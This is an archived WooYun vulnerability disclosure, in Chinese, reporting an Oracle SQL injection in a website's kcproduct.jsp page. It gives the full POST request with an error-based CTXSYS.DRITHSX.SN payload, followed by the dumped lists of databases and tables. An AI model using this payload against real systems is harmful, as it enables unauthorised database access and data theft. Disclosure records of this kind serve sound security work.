乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-14: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
RT
1、注入点
POST /cpzt/kcproduct.jsp?pros=3&where=3&Type=004004 HTTP/1.1Cache-Control: no-cacheReferer: http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros=Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept-Language: en-us,en;q=0.5Host: **.**.**.**Cookie: JSESSIONID=Q2JzWBKTD1DxnYZfwcVmYCvX7QQFgXvM3n5jwdGmyfwWw1myWVlv!1092529893Accept-Encoding: gzip, deflateContent-Length: 234Content-Type: application/x-www-form-urlencodedbutton=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)+from+DUAL))%7c%7c%27&KC_USE=1
2.涉及database:
available databases [59]:[*] BMXJ[*] CTXSYS[*] DANG[*] DBSNMP[*] DMSYS[*] EXFSYS[*] FAW_FWKC[*] FAW_FWQC[*] FAW_GONGHUI[*] FAW_TW[*] FAWGLB[*] FAWONLINE[*] FDJ[*] FFCL[*] FWQCNEW[*] FY[*] GZTD[*] HAQING[*] HONGQI[*] HYJD[*] JF_JHSB[*] JFCC[*] JFGS[*] JG[*] JIEFANG[*] JLS_HOSPITAL[*] JSZX[*] KECHE[*] MARKETING[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] QCBZ[*] QCCY[*] QCDZ[*] QIMING[*] QMSN[*] SALEEVAL[*] SCB[*] SCBSEARCH[*] SCOTT[*] SHCOM[*] SHJD[*] SHSYB[*] SYS[*] SYSMAN[*] SYSTEM[*] TIAA[*] TSMSYS[*] TW[*] TZSB[*] WHZG[*] WMSYS[*] WP[*] XDB[*] XNYQC[*] YQFW[*] YQQN
3.其中一个database的tables
Database: FAW_FWKC[55 tables]+--------------------+| DIC_P3DIC || DIC_PDIC || DIC_SONLEI || DSJ_ARTICLE || DSJ_CONTENT || DSJ_PIC || DSJ_TEMPLATE || DSJ_TYPE || FWKC_DPPARAM_TABLE || FWKC_FGS || FWKC_FGSLB || FWKC_FWS || FWKC_FWSLB || FWKC_FWZ || FWKC_FWZLB || FWKC_PARAM_TABLE || HYZX_ARTICLE || HYZX_CONTENT || HYZX_PIC || HYZX_TEMPLATE || HYZX_TYPE || LY || MAINITEM || PUBLIC_AREA || PUBLIC_DWZP || PUBLIC_FBZT || PUBLIC_HISTORY || PUBLIC_HTML || PUBLIC_HTYPE || PUBLIC_LOGIN || PUBLIC_MODULE || PUBLIC_TABLE || PUBLIC_UPDOWN || PUBLIC_UPFILE || PUBLIC_XXTJ || PUBLIC_ZTHF || QM_MODULE || QM_ROLEDM || SDF_ARTICLE || SDF_CONTENT || SDF_PIC || SDF_TEMPLATE || SDF_TYPE || WEB_LY || XCZT_ARTICLE || XCZT_CONTENT || XCZT_PIC || XCZT_TEMPLATE || XCZT_TYPE || XWDT_ARTICLE || XWDT_CONTENT || XWDT_PIC || XWDT_TEMPLATE || XWDT_TYPE || YQZX_DUAL |+--------------------+
如上
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-10-19 08:47
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无